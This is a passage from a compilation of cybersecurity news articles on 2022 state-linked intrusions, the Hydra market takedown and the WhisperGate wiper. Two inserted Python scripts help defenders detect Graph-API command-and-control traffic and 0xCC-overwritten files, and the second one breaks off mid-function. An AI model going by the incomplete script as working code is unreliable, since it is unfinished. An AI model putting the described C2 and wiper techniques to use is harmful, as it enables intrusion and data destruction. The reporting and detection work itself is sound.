Last week, Malwarebytes Labs implicated the hacking crew in a new set of late March attacks directed against Ukrainian organizations, including a private TV channel named ICTV, by means of a spear-phishing lure that contained macro-embedded Excel documents, leading to the distribution of the GrimPlant backdoor (aka Elephant Implant).
The disclosure comes as several advanced persistent threat (APT) groups from Iran, China, North Korea, and Russia have capitalized on the ongoing Russo-Ukrainian war as a pretext to backdoor victim networks and stage other malicious activities.
U.S. Treasury Department Sanctions Russia-based Hydra Darknet Marketplace
6.4.22 BigBrothers Thehackernews
The U.S. Treasury Department on Tuesday sanctioned Hydra, the same day German law enforcement authorities disrupted the world's largest and longest-running dark web marketplace following a coordinated operation in partnership with U.S. officials.
The sanctions are part of an "international effort to disrupt proliferation of malicious cybercrime services, dangerous drugs, and other illegal offerings available through the Russia-based site," the Treasury Department said in a statement.
Along with the sanctions, the Office of Foreign Assets Control (OFAC) disclosed a list of more than 100 virtual currency addresses that have been identified as associated with the entity's operations to conduct illicit transactions.
The sanctions come as Germany's Federal Criminal Police Office shut down the online criminal marketplace that it said specialized in narcotics trade, seizing its servers and 543 bitcoins worth 23 million euros ($25.3 million).
Hydra was a Russian-language darknet platform that had been accessible via the Tor network since at least November 2015, facilitating the trafficking of outlawed goods and services, including illegal drugs, stolen financial information, fraudulent identification documents, and money laundering and mixing services.
The Treasury Department, in a related move, also sanctioned the virtual currency exchange Garantex, making it the third crypto platform to be blocklisted by the U.S. after SUEX and CHATEX.
"Analysis of known Garantex transactions shows that over $100 million in transactions are associated with illicit actors and darknet markets, including nearly $6 million from Russian RaaS gang Conti and also including approximately $2.6 million from Hydra," the Treasury Department noted.
In a simultaneous move, the Department of Justice (DoJ) announced charges against Dmitry Olegovich Pavlov, a 30-year-old Russian national, in connection with operating the servers used to run Hydra, in addition to accusing him of furthering the distribution of narcotics and engaging in money laundering.
Pavlov is alleged to have operated a company named Promservice Ltd., also known as Hosting Company Full Drive, All Wheel Drive, and 4x4host.ru, to commandeer the servers. He also purportedly conspired with other operators of the marketplace by providing the infrastructure backbone that enabled its success in a "competitive darknet market environment."
"In 2021, Hydra accounted for an estimated 80% of all darknet market-related cryptocurrency transactions, and since 2015, the marketplace has received approximately $5.2 billion in cryptocurrency," the DoJ said.
Besides allowing vendors to openly advertise a variety of deadly drugs for sale through a five-star rating system, Hydra is also said to have functioned as a distribution channel for forged passports and drivers' licenses as well as hacking tools and services that allowed bad actors to gain illegal access to online accounts.
These transactions on Hydra were conducted in virtual currency and its administrators charged a commission for every transaction conducted on the website. Hydra also provided users with cash-out and mixing services to convert their bitcoins into different forms of digital crypto assets and conceal their tracks.
"The dismantling of the Hydra Market, the dark web's largest supplier of illicit goods and services, sends a message to these electronic criminal kingpins that think they can operate with impunity," said Special Agent in Charge Anthony Salisbury of Homeland Security Investigations (HSI) Miami.
"HSI will continue to work with our U.S. and international law enforcement partners to target these transnational criminal organizations who attempt to manipulate the anonymity of the dark web to push their poison all over the world," Salisbury added.
The takedown has predictably "prompted heated discussions" on the dark web, as threat actors relying on the services offered by Hydra speculate about the future of the marketplace and point out the possibility that authorities or other malicious parties could "set up fake versions of Hydra in order to track down former users."
However, the administrators of Hydra have not acknowledged the closure and are attempting to paint a different picture, cybersecurity company Flashpoint said, with the operators reportedly claiming that "the market is undergoing 'technical works.'"
Germany Shuts Down Russian Hydra Darknet Market; Seizes $25 Million in Bitcoin
5.4.22 BigBrothers Thehackernews
Germany's Federal Criminal Police Office, the Bundeskriminalamt (BKA), on Tuesday announced the official takedown of Hydra, the world's largest illegal dark web marketplace that has cumulatively facilitated over $5 billion in Bitcoin transactions to date.
"Bitcoins amounting to currently the equivalent of approximately 23 million were seized, which are attributed to the marketplace," the BKA said in a press release. Blockchain analytics firm Elliptic confirmed that the seizure occurred on April 5, 2022, in a series of 88 transactions amounting to 543.3 BTC.
The agency attributed the shutdown of Hydra to an extensive investigation operation conducted by its Central Office for Combating Cybercrime (ZIT) in partnership with U.S. law enforcement authorities since August 2021.
Launched in 2015, Hydra was a Russian-language darknet marketplace that opened as a competitor to the now-defunct Russian Anonymous Marketplace (aka RAMP), primarily known for its high-traffic narcotics market before expanding its focus to peddle forged documents and stolen credit cards.
"Cybercriminals now use it to conduct illicit sales of stolen credit cards, SIM cards, and counterfeit documents and IDs, among other offerings as well as to obfuscate their own digital transactions through regional exchanges and extended money laundering tactics," Flashpoint noted in a May 2021 report.
Hydra's annual transaction volumes are estimated to have crossed $1.6 billion by the end of 2021, marking a staggering rise from a mere $6.6 million in 2016.
The dark web shop, which is believed to have had a turnover of $424.2 million for the first three months of 2022, also featured a Bitcoin Bank Mixer, which obfuscated all digital transactions made on the platform, thereby making it difficult for law enforcement agencies to track the cryptocurrency trails.
Visitors to the marketplace website are now greeted by a seizure banner that says: "The platform and the criminal content have been seized by the Federal Criminal Police Office (BKA) on behalf of the Attorney General's Office in Frankfurt am Main in the course of an international coordinated law enforcement operation."
The demise of Hydra follows a wave of recent law enforcement actions against criminal marketplaces since the start of the year, including that of UniCC, Canadian HeadQuarters, and four Russian carding shops Ferum Shop, Sky-Fraud, Trump's Dumps, and UAS that specialized in the sales of stolen credit cards.
Researchers Trace Widespread Espionage Attacks Back to Chinese 'Cicada' Hackers
5.4.22 BigBrothers Thehackernews
A Chinese state-backed advanced persistent threat (APT) group known for singling out Japanese entities has been attributed to a new long-running espionage campaign targeting new geographies, suggesting a "widening" of the threat actor's targeting.
The widespread intrusions, which are believed to have commenced at the earliest in mid-2021 and continued as recently as February 2022, have been tied to a group tracked as Cicada, which is also known as APT10, Stone Panda, Potassium, Bronze Riverside, or MenuPass Team.
"Victims in this Cicada (aka APT10) campaign include government, legal, religious, and non-governmental organizations (NGOs) in multiple countries around the world, including in Europe, Asia, and North America," researchers from the Symantec Threat Hunter Team, part of Broadcom Software, said in a report shared with The Hacker News.
"There is a strong focus on victims in the government and NGO sectors, with some of these organizations working in the areas of religion and education," Brigid O. Gorman, senior information developer at the Symantec Threat Hunter Team, told The Hacker News.
Most of the targeted organizations are located in the U.S., Canada, Hong Kong, Turkey, Israel, India, Montenegro, and Italy, alongside one victim in Japan, with the adversary spending as long as nine months on the networks of some of these victims.
"There are also some victims in the telecoms, legal and pharmaceutical sectors, but governmental and non-profit organizations appeared to have been the main focus in this campaign," Gorman added.
In March 2021, Kaspersky researchers took the wraps off an intelligence-gathering operation undertaken by the group to deploy information-gathering implants against organizations in a number of industry sectors located in Japan.
Then earlier this February, Stone Panda was implicated in an organized supply chain attack aimed at Taiwan's financial sector with the goal of stealing sensitive information from compromised systems.
The new set of attacks observed by Symantec commences with the actors gaining initial access by means of a known, unpatched vulnerability in Microsoft Exchange Servers, using it to deploy their backdoor of choice, SodaMaster.
"However, we did not observe the attackers exploiting a specific vulnerability, so we cannot say if they leveraged ProxyShell or ProxyLogon [flaws]," Gorman said.
SodaMaster is a Windows-based remote access trojan that's equipped with features to facilitate the retrieval of additional payloads and exfiltrate the information back to its command-and-control (C2) server.
Other tools deployed during the infiltrations include the Mimikatz credential dumping utility, NBTScan to conduct internal reconnaissance, WMIExec for remote command execution, and VLC Media Player to launch a custom loader on the infected host.
"This campaign with victims in such a large number of sectors appears to show the group is now interested in a wider variety of targets," Gorman said.
"The sorts of organizations targeted nonprofits and government organizations, including those involved in religious and education activity are most likely to be of interest to the group for espionage purposes. The sort of activity we see on victim machines and past Cicada activity also all point to the motivation behind this campaign being espionage."
Chinese Hackers Target VMware Horizon Servers with Log4Shell to Deploy Rootkit
2.4.22 BigBrothers Thehackernews
A Chinese advanced persistent threat tracked as Deep Panda has been observed exploiting the Log4Shell vulnerability in VMware Horizon servers to deploy a backdoor and a novel rootkit on infected machines with the goal of stealing sensitive data.
"The nature of targeting was opportunistic insofar that multiple infections in several countries and various sectors occurred on the same dates," said Rotem Sde-Or and Eliran Voronovitch, researchers with Fortinet's FortiGuard Labs, in a report released this week. "The victims belong to the financial, academic, cosmetics, and travel industries."
Deep Panda, also known by the monikers Shell Crew, KungFu Kittens, and Bronze Firestone, is said to have been active since at least 2010, with recent attacks "targeting legal firms for data exfiltration and technology providers for command-and-control infrastructure building," according to Secureworks.
Cybersecurity firm CrowdStrike, which assigned the panda-themed name to the threat cluster all the way back in July 2014, called it "one of the most advanced Chinese nation-state cyber intrusion groups."
The latest set of attacks documented by Fortinet shows that the infection procedure involved the exploitation of the Log4j remote code execution flaw (aka Log4Shell) in vulnerable VMware Horizon servers to spawn a chain of intermediate stages, ultimately leading to the deployment of a backdoor dubbed Milestone ("1.dll").
Based on the leaked source code of the infamous Gh0st RAT but with notable differences in the command-and-control (C2) communication mechanism employed, Milestone is also designed to send information about the current sessions on the system to the remote server.
Also detected during the attacks is a kernel rootkit called "Fire Chili" that's digitally signed with stolen certificates from game development companies, enabling it to evade detection by security software and conceal malicious file operations, processes, registry key additions, and network connections.
This is achieved by means of ioctl (input/output control) system calls to hide the driver rootkit's registry key, the Milestone backdoor files, and the loader file and process used to launch the implant.
Fortinet's attribution to Deep Panda stems from overlaps between Milestone and Infoadmin RAT, a remote access trojan used by the sophisticated hacking collective in the early 2010s, with additional clues pointing to tactical similarities to that of the Winnti group.
This is backed by the use of compromised digital signatures belonging to gaming companies, a target of choice for Winnti, as well as a C2 domain (gnisoft[.]com), which has been previously linked to the Chinese state-sponsored actor as of May 2020.
"The reason these tools are linked to two different groups is unclear at this time," the researchers said. "It's possible that the groups' developers shared resources, such as stolen certificates and C2 infrastructure, with each other. This may explain why the samples were only signed several hours after being compiled."
The disclosure adds to a long list of hacking groups that have weaponized the Log4Shell vulnerability to strike VMware's virtualization platform.
In December 2021, CrowdStrike described an unsuccessful campaign undertaken by an adversary dubbed Aquatic Panda that leveraged the flaw to perform various post-exploitation operations, including reconnaissance and credential harvesting on targeted systems.
Since then, multiple groups have joined the fray, including the Iranian TunnelVision group, which was observed actively exploiting the Log4j logging library defect to compromise unpatched VMware Horizon servers with ransomware.
Most recently, cybersecurity company Sophos highlighted a slew of attacks against vulnerable Horizon servers that have been ongoing since January and have been mounted by threat actors to illicitly mine cryptocurrency, install PowerShell-based reverse shells, or to deploy Atera agents to remotely deliver additional payloads.
"Attempts to compromise Horizon servers are among the more targeted exploits of Log4Shell vulnerabilities because of their nature," Sophos researchers said, adding "platforms such as Horizon are particularly attractive targets to all types of malicious actors because they are widespread and can (if still vulnerable) easily found and exploited with well-tested tools."
Hackers Exploited MSHTML Flaw to Spy on Government and Defense Targets
26.1.2022 BigBrothers Thehackernews
Cybersecurity researchers on Tuesday took the wraps off a multi-stage espionage campaign targeting high-ranking government officials overseeing national security policy and individuals in the defense industry in Western Asia.
The attack is unique as it leverages Microsoft OneDrive as a command-and-control (C2) server and is split into as many as six stages to stay as hidden as possible, Trellix, a new company created following the merger of security firms McAfee Enterprise and FireEye, said in a report shared with The Hacker News.
"This type of communication allows the malware to go unnoticed in the victims' systems since it will only connect to legitimate Microsoft domains and won't show any suspicious network traffic," Trellix explained.
First signs of activity associated with the covert operation are said to have commenced as early as June 18, 2021, with two victims reported on September 21 and 29, followed by 17 more in a short span of three days between October 6 and 8.
Trellix attributed the sophisticated attacks with moderate confidence to the Russia-based APT28 group, also tracked under the monikers Sofacy, Strontium, Fancy Bear, and Sednit, based on similarities in the source code as well as in the attack indicators and geopolitical objectives.
"We are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were set up," Trellix security researcher Marc Elias said.
The infection chain begins with the execution of a Microsoft Excel file containing an exploit for the MSHTML remote code execution vulnerability (CVE-2021-40444), which is used to run a malicious binary that acts as the downloader for a third-stage malware dubbed Graphite.
The DLL executable uses OneDrive as the C2 server via the Microsoft Graph API to retrieve additional stager malware that ultimately downloads and executes Empire, an open-source PowerShell-based post-exploitation framework widely abused by threat actors for follow-on activities.
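The "only legitimate Microsoft domains" property described above is exactly what makes network-level blocking unhelpful, so the practical detection point is the process making the connection rather than the destination. The following Python script is an added example for defenders, not Trellix's code or anything from the original report: it reads constructed endpoint network-connection records in a simplified Sysmon-like layout (timestamp|host|image|dest_host|dest_port; the format, host names, paths and the process allowlist are all assumptions to be tuned per environment, graph.microsoft.com being the real Graph API hostname) and flags processes that reach Microsoft cloud endpoints without being a known client, or that carry a known client's name but run from an unexpected directory. It also marks connection sets with a fixed interval, the cadence a polling implant tends to show.

```python
"""Flag unexpected processes talking to Microsoft Graph / OneDrive endpoints.

Added example, not Trellix's or the report's code. Assumes a constructed log
layout resembling Sysmon Event ID 3 network connections, one record per line:
    timestamp|host|image path|destination hostname|destination port
"""
import ntpath
from collections import defaultdict
from datetime import datetime

# Endpoints an implant using OneDrive/Graph as C2 would have to contact.
CLOUD_HOSTS = {"graph.microsoft.com", "login.microsoftonline.com"}

# Clients expected to reach those endpoints, keyed by executable name, with the
# directory fragments they should run from. Assumption: tune to your estate.
EXPECTED_IMAGES = {
    "onedrive.exe": (r"\appdata\local\microsoft\onedrive", r"\program files\microsoft onedrive"),
    "excel.exe": (r"\program files\microsoft office",),
    "outlook.exe": (r"\program files\microsoft office",),
    "msedge.exe": (r"\program files (x86)\microsoft\edge",),
}

# Constructed sample records (hosts, users and timestamps are invented).
SAMPLE_LOG = r"""
2021-10-06T09:12:01Z|WS-0142|C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe|graph.microsoft.com|443
2021-10-06T09:12:44Z|WS-0142|C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|login.microsoftonline.com|443
2021-10-06T09:13:10Z|WS-0142|C:\Windows\System32\rundll32.exe|graph.microsoft.com|443
2021-10-06T09:18:10Z|WS-0142|C:\Windows\System32\rundll32.exe|graph.microsoft.com|443
2021-10-06T09:23:10Z|WS-0142|C:\Windows\System32\rundll32.exe|graph.microsoft.com|443
2021-10-06T09:30:02Z|WS-0377|C:\Users\bob\AppData\Local\Temp\OneDrive.exe|graph.microsoft.com|443
2021-10-06T09:31:15Z|WS-0377|C:\Program Files\Mozilla Firefox\firefox.exe|example.org|443
"""


def classify_image(image):
    """Return None for an expected client, otherwise a short reason string."""
    low = image.lower()
    name = ntpath.basename(low)          # ntpath so Windows paths parse on any OS
    directory = ntpath.dirname(low)
    prefixes = EXPECTED_IMAGES.get(name)
    if prefixes is None:
        return "unexpected process contacting Microsoft cloud endpoint"
    if not any(p in directory for p in prefixes):
        return "expected process name running from unexpected path"
    return None


def is_periodic(timestamps, tolerance_s=5):
    """True when three or more connections are spaced at a near-constant interval."""
    if len(timestamps) < 3:
        return False
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    return max(gaps) - min(gaps) <= tolerance_s


def find_suspicious(log_text):
    """Group suspicious connections per (host, image) and describe each group."""
    groups = defaultdict(list)
    reasons = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        stamp, host, image, dest, _port = line.split("|")
        if dest.lower() not in CLOUD_HOSTS:
            continue                      # not a Microsoft cloud endpoint: out of scope here
        reason = classify_image(image)
        if reason is None:
            continue                      # known client from its expected location
        key = (host, image)
        groups[key].append(datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ"))
        reasons[key] = reason
    alerts = []
    for (host, image), stamps in groups.items():
        alerts.append({
            "host": host,
            "image": image,
            "reason": reasons[(host, image)],
            "connections": len(stamps),
            "periodic": is_periodic(stamps),
        })
    return sorted(alerts, key=lambda a: (a["host"], a["image"]))


if __name__ == "__main__":
    for alert in find_suspicious(SAMPLE_LOG):
        print(f"{alert['host']}: {alert['image']} -> {alert['reason']} "
              f"({alert['connections']} connections, periodic={alert['periodic']})")
```

The allowlist is keyed on both executable name and directory on purpose: matching on name alone would be defeated by dropping a file called OneDrive.exe into a temp folder, which is the second alert the sample produces. The cadence check is a weak signal on its own (plenty of legitimate clients poll on a timer) and is reported alongside the process verdict rather than used as a trigger.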
If anything, the development marks the continued exploitation of the MSHTML rendering engine flaw, with Microsoft and SafeBreach Labs disclosing multiple campaigns that have weaponized the vulnerability to plant malware and distribute custom Cobalt Strike Beacon loaders.
U.S. Sanctions 4 Ukrainians for Working with Russia to Destabilize Ukraine
24.1.2022 BigBrothers Thehackernews
The U.S. Treasury Department on Thursday announced sanctions against four current and former Ukrainian government officials for engaging in "Russian government-directed influence activities" in the country, including gathering sensitive information about its critical infrastructure.
The agency said the four individuals were involved in different roles as part of a concerted influence campaign to destabilize the nation, while also accusing Russia's national security authority, the Federal Security Service (FSB), of recruiting Ukrainians in key positions to create instability.
Two of the officials, Taras Kozak and Oleh Voloshyn, are alleged to have worked to amplify false narratives and undermine confidence in the Ukrainian government, while Vladimir Sivkovich, former Deputy Secretary of the Ukrainian National Security and Defense Council, attempted to build support for Ukraine to officially cede Crimea to Russia.
"Russia has directed its intelligence services to recruit current and former Ukrainian government officials to prepare to take over the government of Ukraine and to control Ukraine's critical infrastructure with an occupying Russian force," the Treasury Department said.
Volodymyr Oliynyk, the fourth Ukrainian official to be sanctioned, acted in concert with the FSB in 2021 to collect information pertaining to critical infrastructure in the country, which was then used by Russian-backed state hackers to wage a cyber war against the country.
"As Russia has pursued broad cyber operations against critical infrastructure, it has focused on disrupting one critical infrastructure sector in particular: Ukraine's energy sector," the Treasury Department added.
The sanctions come amid mounting tensions that Russia is preparing for a possible invasion of Ukraine, and almost a week after no fewer than 70 Ukrainian government agencies and private sector organizations fell victim to a coordinated digital assault that saw websites defaced and destructive malware deployed.
DoNot Hacking Team Targeting Government and Military Entities in South Asia
21.1.2022 BigBrothers Thehackernews
A threat actor with potential links to an Indian cybersecurity company has been nothing if not remarkably persistent in its attacks against military organizations based in South Asia, including Bangladesh, Nepal, and Sri Lanka, since at least September 2020, deploying different variants of its bespoke malware framework.
Slovak cybersecurity firm ESET attributed the highly targeted attacks to a hacking group known as Donot Team. "Donot Team has been consistently targeting the same entities with waves of spear-phishing emails with malicious attachments every two to four months," researchers Facundo Muñoz and Matías Porolli said.
Operating since at least 2016, Donot Team (also known as APT-C-35 and SectorE02) has been linked to a string of intrusions primarily targeting embassies, governments, and military entities in Bangladesh, Sri Lanka, Pakistan, and Nepal with Windows and Android malware.
In October 2021, Amnesty International unearthed evidence tying the group's attack infrastructure to an Indian cybersecurity company called Innefu Labs, raising suspicions that the threat actor may be selling the spyware or offering a hackers-for-hire service to governments of the region.
While it's not uncommon for APT groups to re-attack a previously compromised network by deploying stealthier backdoors to cover up their tracks, Donot Team tries a different tack in that it deploys multiple variants of the malware already in its arsenal.
Delivered via weaponized Microsoft Office documents, the so-called yty malware framework is a chain of intermediary downloaders that culminates in the execution of a backdoor, which takes care of retrieving additional components capable of harvesting files, recording keystrokes and screenshots, and deploying reverse shells for remote access.
ESET dubbed the new variants of yty, DarkMusical and Gedit, with telemetry data pointing to attacks from a third variant called Jaca from March to July 2021. The first wave of attacks using DarkMusical is said to have occurred in June 2021, while Gedit-related campaigns were observed as early as September 2020, only to pick up the pace a year later.
What's more, a fourth set of attacks that happened between February and March 2021 targeting military organizations in Bangladesh and Sri Lanka leveraged a modified version of Gedit codenamed Henos.
"Donot Team makes up for its low sophistication with tenacity," the researchers concluded. "We expect that it will continue to push on regardless of its many setbacks. Only time will tell if the group evolves its current TTPs and malware."
Russian Hackers Heavily Using Malicious Traffic Direction System to Distribute Malware
21.1.2022 BigBrothers Thehackernews
Potential connections between a subscription-based crimeware-as-a-service (CaaS) solution and a cracked copy of Cobalt Strike have been established, in what researchers suspect is being offered as a tool for the service's customers to stage post-exploitation activities.
Prometheus, as the service is called, first came to light in August 2021 when cybersecurity company Group-IB disclosed details of malicious software distribution campaigns undertaken by cybercriminal groups to distribute Campo Loader, Hancitor, IcedID, QBot, Buer Loader, and SocGholish in Belgium and the U.S.
Costing $250 a month, it's marketed on Russian underground forums as a traffic direction system (TDS) to enable phishing redirection on a mass scale to rogue landing pages that are designed to deploy malware payloads on the targeted systems.
"Prometheus can be considered a full-bodied service/platform that allows threat groups to purvey their malware or phishing operations with ease," BlackBerry Research and Intelligence Team said in a report shared with The Hacker News. "The main components of Prometheus include a web of malicious infrastructure, malicious email distribution, illicit file-hosting through legitimate services, traffic redirection and the ability to deliver malicious files."
Typically, the redirection is funneled from one of two main sources, namely with the help of malicious ads (aka malvertising) on legitimate websites, or via websites that have been tampered with to insert malicious code.
In the case of Prometheus, the attack chain starts with a spam email containing an HTML file or a Google Docs page that, upon interaction, redirects the victim to a compromised website hosting a PHP backdoor that fingerprints the machine to determine whether "to serve the victim with malware or redirect them to another page that might contain a phishing scam."
Earliest activity connected to the operators of the service, who go by the name "Ma1n" on hacking forums, is said to have commenced in October 2018, with the author linked to other illicit tools offering high quality redirects and PowerMTA kits for mailing to corporate mailboxes, before putting up Prometheus TDS for sale on September 22, 2020.
That's not all. BlackBerry also found overlaps between Prometheus-related activity and an illegitimate version of the Cobalt Strike adversary simulation and threat emulation software, raising the possibility that the copy is being "proliferated by the Prometheus operators themselves."
"It's possible that someone connected with the Prometheus TDS is maintaining this cracked copy and providing it upon purchase," the researchers said. "It is also possible that this cracked installation may be provided as part of a standard playbook or a virtual machine (VM) installation."
This is substantiated by the fact that a number of threat actors, including DarkCrystal RAT, FickerStealer, FIN7, Qakbot, and IcedID, as well as ransomware cartels such as REvil, Ryuk (Wizard Spider), BlackMatter, and Cerber, have used the cracked copy in question over the last two years.
On top of that, the same Cobalt Strike Beacon has also been observed in conjunction with activities associated with an initial access broker tracked as Zebra2104, whose services have been put to use by groups like StrongPity, MountLocker, and Phobos for their own campaigns.
"While TDS'es aren't a new concept, the level of complexity, support and low financial cost adds credence to the theory that this is a trend that is likely to rise in the threat landscape's near future," the researchers noted.
"The volume of groups that are using offerings such as the Prometheus TDS, speak to the success and efficacy of these illicit infrastructure for hire services, which are in essence full-fledged enterprises that support the malicious activities of groups regardless of their size, level of resourcing or motives."
Ukraine: Recent Cyber Attacks Part of Wider Plot to Sabotage Critical Infrastructure
21.1.2022 BigBrothers Thehackernews
The coordinated cyberattacks targeting Ukrainian government websites and the deployment of a data-wiper malware called WhisperGate on select government systems are part of a broader wave of malicious activities aimed at sabotaging critical infrastructure in the country.
The Secret Service of Ukraine (SSU) on Monday confirmed that the two incidents are related, adding that the breaches also exploited the recently disclosed Log4j vulnerabilities to gain access to some of the compromised systems.
"The attack used vulnerabilities in the site's content management systems (October CMS) and Log4j, as well as compromised accounts of employees of the development company," the SSU said, corroborating prior disclosure from the Ukraine CERT team.
The disclosure comes days after Microsoft warned of a malware operation aimed at government, non-profit, and information technology entities in Ukraine, attributing the attacks to a threat cluster codenamed "DEV-0586."
"The attackers corrupted MBR records (the service information on the media required to access the data) on individual servers and user computers. Moreover, this applies to both operating systems running Windows and Linux."
The Ukrainian Cyber Police, for its part, noted that it's investigating a combination of three intrusion vectors that were likely used to pull off the attacks: a supply chain attack targeting an IT firm which manages websites for the Ukrainian government, exploitation of the flaw in October CMS, and Log4j vulnerabilities.
What's more, the IT firm referenced by Microsoft, Kitsoft, confirmed on Facebook it had been hit with the WhisperGate malware. "The current situation is not just about hacking websites, it is an attack aimed at sowing panic and fear, destabilizing the country from within," the company said.
While neither the Cyber Police nor the SSU attributed the defacements and the destructive malware attacks to any threat group or state-sponsored actor, the Ukrainian Ministry of Digital Transformation pointed fingers at Russia, accusing the country of trying to "wage a hybrid war."
Earth Lusca Hackers Aimed at High-Value Targets in Government and Private Sectors
19.1.2022 BigBrothers Thehackernews
An elusive threat actor called Earth Lusca has been observed striking organizations across the world as part of what appears to be simultaneously an espionage campaign and an attempt to reap monetary profits.
"The list of its victims includes high-value targets such as government and educational institutions, religious movements, pro-democracy and human rights organizations in Hong Kong, COVID-19 research organizations, and the media, amongst others," Trend Micro researchers said in a new report. "However, the threat actor also seems to be financially motivated, as it also took aim at gambling and cryptocurrency companies.
The cybersecurity firm attributed the group as part of the larger China-based Winnti cluster, which refers to a number of linked groups rather than a single discrete entity that are focused on intelligence gathering and intellectual property theft.
Earth Lusca's intrusion routes are facilitated by spear-phishing and watering hole attacks, while also leveraging vulnerabilities in public-facing applications, such as Microsoft Exchange ProxyShell and Oracle GlassFish Server exploits, as an attack vector.
The infection chains lead to the deployment of Cobalt Strike, alongside a variety of additional malware such as Doraemon, ShadowPad, Winnti, FunnySwitch, and web shells like AntSword and Behinder.
Cobalt Strike is a full-featured intrusion suite that originated as a legitimate remote access tool, developed for red teams to use in penetration testing. However, in recent years, it has become one of the preferred tools in a threat actor's arsenal and the primary means of turning a foothold into a hands-on intrusion.
Interestingly, while the attacks also involve installing cryptocurrency miners on infected hosts, the researchers pointed out that "the revenue earned from the mining activities seem low."
Telemetry data gathered by Trend Micro reveal that Earth Lusca staged attacks against entities that could be of strategic interest to the Chinese government, including:
Gambling companies in Mainland China
Government institutions in Taiwan, Thailand, Philippines, Vietnam, United Arab Emirates, Mongolia, and Nigeria
Educational institutions in Taiwan, Hong Kong, Japan, and France
News media in Taiwan, Hong Kong, Australia, Germany, and France
Pro-democracy and human rights political organizations and movements in Hong Kong
COVID-19 research organizations in the U.S.
Telecom companies in Nepal
Religious movements that are banned in Mainland China, and
Various cryptocurrency trading platforms
"Evidence points to Earth Lusca being a highly-skilled and dangerous threat actor mainly motivated by cyberespionage and financial gain. However, the group still primarily relies on tried-and-true techniques to entrap a target," the researchers said.
"While this has its advantages (the techniques have already proven to be effective), it also means that security best practices, such as avoiding clicking on suspicious email/website links and updating important public-facing applications, can minimize the impact or even stop an Earth Lusca attack."
Ukrainian Government Officially Accuses Russia of Recent Cyberattacks
19.1.2022 BigBrothers Thehackernews
The government of Ukraine on Sunday formally accused Russia of masterminding the attacks that targeted websites of public institutions and government agencies this past week.
"All the evidence points to the fact that Russia is behind the cyber attack," the Ministry of Digital Transformation said in a statement. "Moscow continues to wage a hybrid war and is actively building forces in the information and cyberspace."
The purpose of the attack, said the ministry, "is not only to intimidate society," but to also "destabilize the situation in Ukraine by stopping the work of the public sector and undermining the confidence in the government on the part of Ukrainians."
Russia, however, has denied it was behind the intrusion. "We have nothing to do with it, and Russia has nothing to do with these cyberattacks," Dmitry Peskov, press secretary for President Vladimir Putin, told CNN, adding "We are nearly accustomed to the fact that Ukrainians are blaming everything on Russia, even their bad weather."
The disclosure comes as scores of Ukrainian government websites were vandalized on Friday with an ominous message threatening its citizens to "be afraid and expect the worst" and alleging their personal information had been hacked.
According to the Security Service of Ukraine (SSU), the attack is believed to have been carried out after the malicious actors gained access to the infrastructure of a private company that had the rights to manage some of the affected websites.
Separately, Microsoft warned of destructive data-wiping malware disguised as ransomware being used in attacks against multiple organizations in Ukraine. The company, which is calling this new malware family WhisperGate, attributed it to a threat cluster it's tracking as DEV-0586.
A New Destructive Malware Targeting Ukrainian Government and Business Entities
19.1.2022 BigBrothers Thehackernews
Cybersecurity teams from Microsoft on Saturday disclosed they identified evidence of a new destructive malware operation dubbed "WhisperGate" targeting government, non-profit, and information technology entities in Ukraine amid brewing geopolitical tensions between the country and Russia.
"The malware is disguised as ransomware but, if activated by the attacker, would render the infected computer system inoperable," Tom Burt, corporate vice president of customer security and trust at Microsoft, said, adding the intrusions were aimed at government agencies that provide critical executive branch or emergency response functions.
Also among those affected by the malware is an IT firm that "manages websites for public and private sector clients, including government agencies whose websites were recently defaced," Burt noted.
The computing giant, which first detected the malware on January 13, attributed the attacks to an emerging threat cluster codenamed "DEV-0586," with no observed overlaps in tactics and procedures to other previously documented groups. It further said the malware was found on dozens of impacted systems, a number it expects to increase as the investigation continues.
According to Microsoft Threat Intelligence Center (MSTIC) and Microsoft Digital Security Unit (DSU), the attack chain is a two-stage process that entails:
Overwriting the Master Boot Record (MBR), the first sector of any hard disk that identifies where the operating system is located in the disk so that it can be loaded into a computer's RAM, on a victim's system to display a fake ransom note urging the target to pay an amount of $10,000 to a bitcoin wallet.
A second-stage executable that retrieves a file corrupter malware hosted on a Discord channel that's designed to search for files with 189 different extensions, then irrevocably overwrite their contents with a fixed number of 0xCC bytes and rename each file with a seemingly random four-byte extension.
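The second stage described above leaves a distinctive trace on disk: file bodies replaced by a run of 0xCC bytes and names ending in a four-character extension that matches nothing the organisation uses. The script below is an added example of how an incident responder might triage a file share or a mounted image for that damage; it is not Microsoft's detection logic and not part of the original report. It assumes the corrupter appends the random extension to the existing name (e.g. report.docx.zq7k), that only the head of a large file needs inspecting because the overwritten run has a fixed size, and that a short allowlist of legitimate four-letter extensions keeps false positives down; the byte count, file names and allowlist are constructed for the demonstration.

```python
"""Triage a directory tree for files overwritten in the WhisperGate style.

Added example, not Microsoft's code. Indicators taken from the report: file
contents replaced by a fixed run of 0xCC bytes, file renamed with a seemingly
random four-byte extension. Sizes, names and the allowlist are constructed.
"""
import os
import re
import tempfile

FILL_BYTE = 0xCC      # byte value the corrupter writes, per the report
HEAD_BYTES = 4096     # assumption: inspect only the head; the overwritten run has a fixed size
RANDOM_EXT = re.compile(r"\.([A-Za-z0-9]{4})$")
# Constructed allowlist: legitimate four-letter extensions that must not be flagged by name alone.
KNOWN_EXTS = {"docx", "xlsx", "pptx", "json", "html", "jpeg", "yaml", "webp"}


def looks_filled(path, head_bytes=HEAD_BYTES):
    """True if the inspected head of the file is entirely FILL_BYTE (empty files are not flagged)."""
    with open(path, "rb") as f:
        head = f.read(head_bytes)
    return len(head) > 0 and head.count(FILL_BYTE) == len(head)


def has_random_extension(name):
    """True if the name ends in a four-character extension that is not a known legitimate one."""
    m = RANDOM_EXT.search(name)
    return bool(m) and m.group(1).lower() not in KNOWN_EXTS


def scan_tree(root):
    """Walk root and return files showing corrupter indicators, sorted by relative path."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not looks_filled(path):
                continue                          # content indicator is the primary signal
            indicators = ["0xCC fill"]
            if has_random_extension(name):
                indicators.append("random 4-byte extension")
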